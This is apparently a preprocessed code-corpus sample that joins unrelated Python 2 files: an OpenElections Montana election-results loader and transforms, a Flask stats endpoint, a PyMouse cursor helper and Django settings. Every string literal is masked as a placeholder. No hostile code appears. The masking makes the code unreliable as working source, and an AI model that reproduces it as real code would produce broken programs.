csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> total_votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> contest_winner = row [ '<STR_LIT>' ] . strip ( ) <EOL> else : <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs [ '<STR_LIT>' ] = row [ '<STR_LIT>' ] . strip ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> county_ocd_id = [ c for c in self . datasource . _jurisdictions ( ) if c [ '<STR_LIT>' ] . upper ( ) == row [ '<STR_LIT>' ] . upper ( ) ] [ <NUM_LIT:0> ] [ '<STR_LIT>' ] <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] , <EOL> '<STR_LIT>' : "<STR_LIT>" . format ( county_ocd_id , ocd_type_id ( jurisdiction ) ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } <EOL> class MTCountyLoader ( MTBaseLoader ) : <EOL> """<STR_LIT>""" <EOL> def load ( self ) : <EOL> headers = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' <EOL> ] <EOL> self . _common_kwargs = self . _build_common_election_kwargs ( ) <EOL> self . _common_kwargs [ '<STR_LIT>' ] = '<STR_LIT>' <EOL> results = [ ] <EOL> with self . _file_handle as csvfile : <EOL> reader = unicodecsv . DictReader ( csvfile , fieldnames = headers , encoding = '<STR_LIT>' ) <EOL> for row in reader : <EOL> if self . _skip_row ( row ) : <EOL> continue <EOL> rr_kwargs = self . _common_kwargs . copy ( ) <EOL> rr_kwargs . update ( self . _build_contest_kwargs ( row ) ) <EOL> rr_kwargs . update ( self . _build_candidate_kwargs ( row ) ) <EOL> if '<STR_LIT>' in row [ '<STR_LIT>' ] . upper ( ) : <EOL> votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> ocd_id = None <EOL> jurisdiction = "<STR_LIT>" <EOL> else : <EOL> if row [ '<STR_LIT>' ] . strip ( ) == '<STR_LIT>' : <EOL> votes = None <EOL> else : <EOL> votes = int ( row [ '<STR_LIT>' ] . strip ( ) ) <EOL> jurisdiction = row [ '<STR_LIT>' ] . strip ( ) <EOL> print row [ '<STR_LIT>' ] <EOL> ocd_id = [ o [ '<STR_LIT>' ] for o in self . datasource . _jurisdictions ( ) if row [ '<STR_LIT>' ] . strip ( ) == o [ '<STR_LIT>' ] ] [ <NUM_LIT:0> ] <EOL> rr_kwargs . update ( { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : jurisdiction , <EOL> '<STR_LIT>' : ocd_id , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : votes <EOL> } ) <EOL> results . append ( RawResult ( ** rr_kwargs ) ) <EOL> RawResult . objects . insert ( results ) <EOL> def _skip_row ( self , row ) : <EOL> return row [ '<STR_LIT>' ] . strip ( ) not in self . target_offices <EOL> def _build_contest_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) , <EOL> } <EOL> def _build_candidate_kwargs ( self , row ) : <EOL> return { <EOL> '<STR_LIT>' : row [ '<STR_LIT>' ] . strip ( ) <EOL> } </s>
<s> from datetime import datetime <EOL> import logging <EOL> import re <EOL> from nameparser import HumanName <EOL> from openelex . base . transform import Transform , registry <EOL> from openelex . models import Candidate , Contest , Office , Party , RawResult , Result <EOL> from openelex . lib . text import ocd_type_id <EOL> from openelex . lib . insertbuffer import BulkInsertBuffer <EOL> logging . basicConfig ( level = logging . INFO ) <EOL> logger = logging . getLogger ( __name__ ) <EOL> meta_fields = [ '<STR_LIT:source>' , '<STR_LIT>' , '<STR_LIT:state>' , ] <EOL> contest_fields = meta_fields + [ '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> candidate_fields = meta_fields + [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' ] <EOL> result_fields = meta_fields + [ '<STR_LIT>' , '<STR_LIT>' , <EOL> '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] <EOL> STATE = '<STR_LIT>' <EOL> class BaseTransform ( Transform ) : <EOL> """<STR_LIT>""" <EOL> PARTY_MAP = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:I>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:R>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT:D>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' <EOL> } <EOL> district_offices = set ( [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] ) <EOL> def __init__ ( self ) : <EOL> super ( BaseTransform , self ) . __init__ ( ) <EOL> self . _office_cache = { } <EOL> self . _party_cache = { } <EOL> self . _contest_cache = { } <EOL> def get_raw_results ( self ) : <EOL> return RawResult . objects . filter ( state = STATE ) . no_cache ( ) <EOL> def get_contest_fields ( self , raw_result ) : <EOL> fields = self . _get_fields ( raw_result , contest_fields ) <EOL> fields [ '<STR_LIT>' ] = self . _get_office ( raw_result ) <EOL> return fields <EOL> def _get_fields ( self , raw_result , field_names ) : <EOL> return { k : getattr ( raw_result , k ) for k in field_names } <EOL> def _get_office ( self , raw_result ) : <EOL> office_query = { <EOL> '<STR_LIT:state>' : STATE , <EOL> '<STR_LIT:name>' : self . _clean_office ( raw_result . office ) <EOL> } <EOL> if office_query [ '<STR_LIT:name>' ] is '<STR_LIT>' : <EOL> office_query [ '<STR_LIT:state>' ] = '<STR_LIT>' <EOL> if office_query [ '<STR_LIT:name>' ] in self . district_offices : <EOL> office_query [ '<STR_LIT>' ] = raw_result . district or '<STR_LIT>' <EOL> key = Office . make_key ( ** office_query ) <EOL> try : <EOL> return self . _office_cache [ key ] <EOL> except KeyError : <EOL> try : <EOL> office = Office . objects . get ( ** office_query ) <EOL> assert key == office . key <EOL> self . _office_cache [ key ] = office <EOL> return office <EOL> except Office . DoesNotExist : <EOL> logger . error ( "<STR_LIT>" . format ( office_query ) ) <EOL> raise <EOL> def get_party ( self , raw_result , attr = '<STR_LIT>' ) : <EOL> party = getattr ( raw_result , attr ) <EOL> if not party : <EOL> return None <EOL> clean_abbrev = self . _clean_party ( party ) <EOL> if not clean_abbrev : <EOL> return None <EOL> try : <EOL> return self . _party_cache [ clean_abbrev ] <EOL> except KeyError : <EOL> try : <EOL> party = Party . objects . get ( abbrev = clean_abbrev ) <EOL> self . _party_cache [ clean_abbrev ] = party <EOL> return party <EOL> except Party . DoesNotExist : <EOL> logger . error ( "<STR_LIT>" . format ( clean_abbrev ) ) <EOL> raise <EOL> def _clean_party ( self , party ) : <EOL> try : <EOL> return self . PARTY_MAP [ party ] <EOL> except KeyError : <EOL> return None <EOL> def _clean_office ( self , office ) : <EOL> """<STR_LIT>""" <EOL> presidential_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> senate_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> house_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> governor_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> treasurer_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> auditor_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> sos_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> lt_gov_regex = re . compile ( r'<STR_LIT>' , re . IGNORECASE ) <EOL> ospi_regex = re . compile ( <EOL> '<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> ag_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> wcpl_regex = re . compile ( '<STR_LIT>' , re . IGNORECASE ) <EOL> local_regex = re . compile ( <EOL> r'<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> national_regex = re . compile ( <EOL> r'<STR_LIT>' , <EOL> re . IGNORECASE ) <EOL> if re . search ( house_regex , office ) : <EOL> if re . search ( national_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( local_regex , office ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return None <EOL> elif re . search ( governor_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( wcpl_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( senate_regex , office ) : <EOL> if re . search ( national_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( local_regex , office ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return None <EOL> elif re . search ( lt_gov_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( ospi_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( sos_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( treasurer_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( auditor_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( ag_regex , office ) : <EOL> return '<STR_LIT>' <EOL> elif re . search ( presidential_regex , office ) : <EOL> return '<STR_LIT>' <EOL> else : <EOL> return None <EOL> def get_candidate_fields ( self , raw_result ) : <EOL> year = raw_result . end_date . year <EOL> fields = self . _get_fields ( raw_result , candidate_fields ) <EOL> try : <EOL> name = HumanName ( raw_result . full_name ) <EOL> except TypeError : <EOL> name = HumanName ( "<STR_LIT>" . format ( raw_result . given_name , raw_result . family_name ) ) <EOL> fields [ '<STR_LIT>' ] = name . first <EOL> fields [ '<STR_LIT>' ] = name . last <EOL> if not fields [ '<STR_LIT>' ] : <EOL> fields [ '<STR_LIT>' ] = "<STR_LIT>" . format ( name . first , name . last ) <EOL> try : <EOL> fields [ '<STR_LIT>' ] = name . middle <EOL> fields [ '<STR_LIT>' ] = name . suffix <EOL> except Exception , e : <EOL> logger . error ( e ) <EOL> return fields <EOL> def get_contest ( self , raw_result ) : <EOL> """<STR_LIT>""" <EOL> key = "<STR_LIT>" % ( raw_result . election_id , raw_result . contest_slug ) <EOL> try : <EOL> return self . _contest_cache [ key ] <EOL> except KeyError : <EOL> fields = self . get_contest_fields ( raw_result ) <EOL> fields . pop ( '<STR_LIT:source>' ) <EOL> try : <EOL> try : <EOL> contest = Contest . objects . filter ( ** fields ) [ <NUM_LIT:0> ] <EOL> except IndexError : <EOL> contest = Contest . objects . get ( ** fields ) <EOL> except Exception : <EOL> print fields <EOL> print "<STR_LIT:\n>" <EOL> raise <EOL> self . _contest_cache [ key ] = contest <EOL> return contest <EOL> class CreateContestsTransform ( BaseTransform ) : <EOL> name = '<STR_LIT>' <EOL> def __call__ ( self ) : <EOL> contests = [ ] <EOL> seen = set ( ) <EOL> for result in self . get_raw_results ( ) : <EOL> key = self . _contest_key ( result ) <EOL> if key not in seen : <EOL> fields = self . get_contest_fields ( result ) <EOL> fields [ '<STR_LIT>' ] = fields [ '<STR_LIT>' ] = datetime . now ( ) <EOL> contest = Contest ( ** fields ) <EOL> contests . append ( contest ) <EOL> seen . add ( key ) <EOL> print seen <EOL> Contest . objects . insert ( contests , load_bulk = False ) <EOL> logger . info ( "<STR_LIT>" . format ( len ( contests ) ) ) <EOL> def reverse ( self ) : <EOL> old = Contest . objects . filter ( state = STATE ) <EOL> logger . info ( '<STR_LIT>' . format ( old . count ( ) ) ) <EOL> old . delete ( ) <EOL> def _contest_key ( self , raw_result ) : <EOL> slug = raw_result . contest_slug <EOL> return ( raw_result . election_id , slug ) <EOL> class CreateCandidatesTransform ( BaseTransform ) : <EOL> name = '<STR_LIT>' <EOL> def __init__ ( self ) : <EOL> super ( CreateCandidatesTransform , self ) . __init__ ( ) <EOL> def __call__ ( self ) : <EOL> candidates = [ ] <EOL> seen = set ( ) <EOL> for rr in self . get_raw_results ( ) : <EOL> key = ( rr . election_id , rr . contest_slug , rr . candidate_slug ) <EOL> if key not in seen : <EOL> fields = self . get_candidate_fields ( rr ) <EOL> if not fields [ '<STR_LIT>' ] : <EOL> quit ( fields ) <EOL> fields [ '<STR_LIT>' ] = self . get_contest ( rr ) <EOL> candidate = Candidate ( ** fields ) <EOL> candidates . append ( candidate ) <EOL> seen . add ( key ) <EOL> Candidate . objects . insert ( candidates , load_bulk = False ) <EOL> logger . info ( "<STR_LIT>" . format ( len ( candidates ) ) ) <EOL> def reverse ( self ) : <EOL> old = Candidate . objects . filter ( state = STATE ) <EOL> print "<STR_LIT>" % old . count ( ) <EOL> old . delete ( ) <EOL> class CreateResultsTransform ( BaseTransform ) : <EOL> name = '<STR_LIT>' <EOL> auto_reverse = True <EOL> def __init__ ( self ) : <EOL> super ( CreateResultsTransform , self ) . __init__ ( ) <EOL> self . _candidate_cache = { } <EOL> def get_raw_results ( self ) : <EOL> return RawResult . objects . filter ( state = STATE ) . no_cache ( ) <EOL> def get_results ( self ) : <EOL> election_ids = self . get_raw_results ( ) . distinct ( '<STR_LIT>' ) <EOL> return Result . objects . filter ( election_id__in = election_ids ) <EOL> def __call__ ( self ) : <EOL> results = self . _create_results_collection ( ) <EOL> for rr in self . get_raw_results ( ) : <EOL> fields = self . _get_fields ( rr , result_fields ) <EOL> fields [ '<STR_LIT>' ] = self . get_contest ( rr ) <EOL> fields [ '<STR_LIT>' ] = self . get_candidate ( rr , extra = { <EOL> '<STR_LIT>' : fields [ '<STR_LIT>' ] , <EOL> } ) <EOL> fields [ '<STR_LIT>' ] = fields [ '<STR_LIT>' ] . contest <EOL> fields [ '<STR_LIT>' ] = rr <EOL> party = self . get_party ( rr ) <EOL> if party : <EOL> fields [ '<STR_LIT>' ] = party . abbrev <EOL> fields [ '<STR_LIT>' ] = self . _strip_leading_zeros ( rr . jurisdiction ) <EOL> fields = self . _alter_result_fields ( fields , rr ) <EOL> result = Result ( ** fields ) <EOL> results . append ( result ) <EOL> self . _create_results ( results ) <EOL> def _alter_result_fields ( self , fields , raw_result ) : <EOL> """<STR_LIT>""" <EOL> fields [ '<STR_LIT>' ] = self . _parse_write_in ( raw_result ) <EOL> fields [ '<STR_LIT>' ] = self . _get_ocd_id ( raw_result , <EOL> jurisdiction = fields [ '<STR_LIT>' ] ) <EOL> return fields <EOL> def _create_results_collection ( self ) : <EOL> """<STR_LIT>""" <EOL> return BulkInsertBuffer ( Result ) <EOL> def _create_results ( self , results ) : <EOL> """<STR_LIT>""" <EOL> results . flush ( ) <EOL> print "<STR_LIT>" % results . count ( ) <EOL> def reverse ( self ) : <EOL> old_results = self . get_results ( ) <EOL> print "<STR_LIT>" % old_results . count ( ) <EOL> old_results . delete ( ) <EOL> def get_candidate ( self , raw_result , extra = { } ) : <EOL> """<STR_LIT>""" <EOL> key = ( raw_result . election_id , raw_result . contest_slug , <EOL> raw_result . candidate_slug ) <EOL> try : <EOL> return self . _candidate_cache [ key ] <EOL> except KeyError : <EOL> fields = self . get_candidate_fields ( raw_result ) <EOL> fields . update ( extra ) <EOL> del fields [ '<STR_LIT:source>' ] <EOL> try : <EOL> candidate = Candidate . objects . get ( ** fields ) <EOL> except Candidate . DoesNotExist : <EOL> print fields <EOL> raise <EOL> self . _candidate_cache [ key ] = candidate <EOL> return candidate <EOL> def _parse_winner ( self , raw_result ) : <EOL> """<STR_LIT>""" <EOL> if raw_result . winner == '<STR_LIT:Y>' : <EOL> return True <EOL> elif raw_result . winner == <NUM_LIT:1> : <EOL> return True <EOL> else : <EOL> return False <EOL> def _parse_write_in ( self , raw_result ) : <EOL> """<STR_LIT>""" <EOL> if raw_result . write_in == '<STR_LIT:Y>' : <EOL> return True <EOL> elif raw_result . family_name == '<STR_LIT>' : <EOL> return True <EOL> elif raw_result . write_in == "<STR_LIT>" : <EOL> return True <EOL> elif raw_result . full_name == "<STR_LIT>" : <EOL> return True <EOL> else : <EOL> return False <EOL> def _get_ocd_id ( self , raw_result , jurisdiction = None , reporting_level = None ) : <EOL> """<STR_LIT>""" <EOL> if reporting_level is None : <EOL> reporting_level = raw_result . reporting_level <EOL> if jurisdiction is None : <EOL> jurisdiction = raw_result . jurisdiction <EOL> juris_ocd = ocd_type_id ( jurisdiction ) <EOL> if reporting_level == "<STR_LIT>" : <EOL> return "<STR_LIT>" % juris_ocd <EOL> elif reporting_level == "<STR_LIT>" : <EOL> return "<STR_LIT>" % juris_ocd <EOL> elif reporting_level == "<STR_LIT>" : <EOL> county_ocd_id = "<STR_LIT:/>" . join ( raw_result . ocd_id . split ( '<STR_LIT:/>' ) [ : - <NUM_LIT:1> ] ) <EOL> return "<STR_LIT>" % ( county_ocd_id , juris_ocd ) <EOL> else : <EOL> return None <EOL> registry . register ( '<STR_LIT>' , CreateContestsTransform ) <EOL> registry . register ( '<STR_LIT>' , CreateCandidatesTransform ) <EOL> registry . register ( '<STR_LIT>' , CreateResultsTransform ) </s>
<s> import json <EOL> import pymongo <EOL> from flask import request , abort , json , render_template , Response <EOL> from flask . ext import restful <EOL> from flask . ext . restful import reqparse <EOL> from flask_rest_service import app , api , mongo <EOL> from bson . objectid import ObjectId <EOL> from bson . code import Code <EOL> class Stats ( restful . Resource ) : <EOL> def get ( self ) : <EOL> return Response ( render_template ( "<STR_LIT>" ) , mimetype = '<STR_LIT>' ) <EOL> api . add_resource ( Stats , '<STR_LIT>' ) </s>
<s> from pymouse import PyMouse <EOL> mouse = PyMouse ( ) <EOL> def AbsoluteMouseMove ( posx , posy ) : <EOL> print '<STR_LIT>' , posx , posy <EOL> mouse . move ( int ( posx ) , int ( posy ) ) <EOL> def AbsoluteMouseClick ( posx , posy ) : <EOL> print '<STR_LIT>' , posx , posy <EOL> mouse . click ( posx , posy ) <EOL> def AbsoluteMouseClickDown ( posx , posy ) : <EOL> print '<STR_LIT>' <EOL> mouse . press ( posx , posy ) <EOL> def AbsoluteMouseClickUp ( posx , posy ) : <EOL> print '<STR_LIT>' <EOL> mouse . release ( posx , posy ) <EOL> def AbsoluteMouseDrag ( posx , posy ) : <EOL> mouse . move ( posx , posy ) <EOL> def AbsoluteMouseRightClick ( posx , posy ) : <EOL> mouse . click ( posx , posy , button = <NUM_LIT:2> ) <EOL> def AbsoluteMouseScroll ( posx , posy , up = True ) : <EOL> if up is True : <EOL> mouse . click ( posx , posy , button = <NUM_LIT:4> ) <EOL> elif up is False : <EOL> mouse . click ( posx , posy , button = <NUM_LIT:5> ) <EOL> def GetDisplayWidth ( ) : <EOL> return mouse . screen_size ( ) [ <NUM_LIT:0> ] <EOL> def GetDisplayHeight ( ) : <EOL> return mouse . screen_size ( ) [ <NUM_LIT:1> ] <EOL> class absolute_cursor ( object ) : <EOL> def __init__ ( self ) : <EOL> self . x_max = GetDisplayWidth ( ) - <NUM_LIT:1> <EOL> self . y_max = GetDisplayHeight ( ) - <NUM_LIT:1> <EOL> self . left_button_pressed = False <EOL> self . x = <NUM_LIT:0> <EOL> self . y = <NUM_LIT:0> <EOL> def move ( self , posx , posy ) : <EOL> self . x = posx <EOL> self . y = posy <EOL> if self . x > self . x_max : <EOL> self . x = self . x_max <EOL> if self . y > self . y_max : <EOL> self . y = self . y_max <EOL> if self . x < <NUM_LIT:0.0> : <EOL> self . x = <NUM_LIT:0.0> <EOL> if self . y < <NUM_LIT:0.0> : <EOL> self . y = <NUM_LIT:0.0> <EOL> if self . left_button_pressed : <EOL> AbsoluteMouseDrag ( self . x , self . y ) <EOL> else : <EOL> AbsoluteMouseMove ( self . x , self . y ) <EOL> def click ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseClick ( posx , posy ) <EOL> def set_left_button_pressed ( self , boolean_button ) : <EOL> if boolean_button == True : <EOL> self . click_down ( ) <EOL> else : <EOL> self . click_up ( ) <EOL> def click_down ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseClickDown ( posx , posy ) <EOL> self . left_button_pressed = True <EOL> def click_up ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseClickUp ( posx , posy ) <EOL> self . left_button_pressed = False <EOL> def rightClick ( self , posx = None , posy = None ) : <EOL> if posx == None : <EOL> posx = self . x <EOL> if posy == None : <EOL> posy = self . y <EOL> AbsoluteMouseRightClick ( posx , posy ) <EOL> def scroll ( self , x_movement , y_movement ) : <EOL> posx = self . x <EOL> posy = self . y <EOL> up = False <EOL> if y_movement < <NUM_LIT:0> : <EOL> up = True <EOL> AbsoluteMouseScroll ( posx , posy , up ) <EOL> class relative_cursor ( absolute_cursor ) : <EOL> def __init__ ( self ) : <EOL> absolute_cursor . __init__ ( self ) <EOL> def move ( self , x_amt , y_amt ) : <EOL> self . x = self . x + x_amt <EOL> self . y = self . y + y_amt <EOL> if self . x > self . x_max : <EOL> self . x = self . x_max <EOL> if self . y > self . y_max : <EOL> self . y = self . y_max <EOL> if self . x < <NUM_LIT:0.0> : <EOL> self . x = <NUM_LIT:0.0> <EOL> if self . y < <NUM_LIT:0.0> : <EOL> self . y = <NUM_LIT:0.0> <EOL> if self . left_button_pressed : <EOL> AbsoluteMouseDrag ( self . x , self . y ) <EOL> else : <EOL> AbsoluteMouseMove ( self . x , self . y ) </s>
<s> import os <EOL> import os . path <EOL> PROJECT_PATH = os . path . dirname ( os . path . abspath ( __file__ ) ) <EOL> if os . environ . get ( '<STR_LIT>' , '<STR_LIT:False>' ) == '<STR_LIT:True>' : <EOL> DEBUG = True <EOL> else : <EOL> DEBUG = False <EOL> TEMPLATE_DEBUG = DEBUG <EOL> ADMINS = ( <EOL> ) <EOL> MANAGERS = ADMINS <EOL> import dj_database_url <EOL> DATABASES = { '<STR_LIT:default>' : dj_database_url . config ( ) } <EOL> ALLOWED_HOSTS = [ '<STR_LIT:*>' ] <EOL> TIME_ZONE = '<STR_LIT>' <EOL> LANGUAGE_CODE = '<STR_LIT>' <EOL> SITE_ID = <NUM_LIT:1> <EOL> USE_I18N = True <EOL> USE_L10N = True <EOL> USE_TZ = True <EOL> LOGIN_URL = '<STR_LIT>' <EOL> LOGIN_REDIRECT_URL = '<STR_LIT:/>' <EOL> MEDIA_ROOT = '<STR_LIT>' <EOL> MEDIA_URL = '<STR_LIT>' <EOL> STATIC_ROOT = os . path . join ( PROJECT_PATH , '<STR_LIT>' ) <EOL> STATIC_URL = '<STR_LIT>' <EOL> STATICFILES_DIRS = ( <EOL> os . path . join ( PROJECT_PATH , '<STR_LIT>' ) , <EOL> ) <EOL> STATICFILES_FINDERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> SECRET_KEY = os . environ . get ( '<STR_LIT>' ) <EOL> TEMPLATE_LOADERS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> MIDDLEWARE_CLASSES = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> ROOT_URLCONF = '<STR_LIT>' <EOL> WSGI_APPLICATION = '<STR_LIT>' <EOL> import os <EOL> DIRNAME = os . path . dirname ( __file__ ) <EOL> TEMPLATE_DIRS = ( <EOL> os . path . join ( DIRNAME , '<STR_LIT>' ) , <EOL> ) <EOL> INSTALLED_APPS = ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ) <EOL> LOGGING = { <EOL> '<STR_LIT:version>' : <NUM_LIT:1> , <EOL> '<STR_LIT>' : False , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT:file>' : { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT:class>' : '<STR_LIT>' , <EOL> '<STR_LIT:filename>' : os . path . join ( PROJECT_PATH , '<STR_LIT>' ) <EOL> } , <EOL> } , <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : { <EOL> '<STR_LIT>' : [ '<STR_LIT:file>' ] , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : True , <EOL> } , <EOL> } , <EOL> } </s>
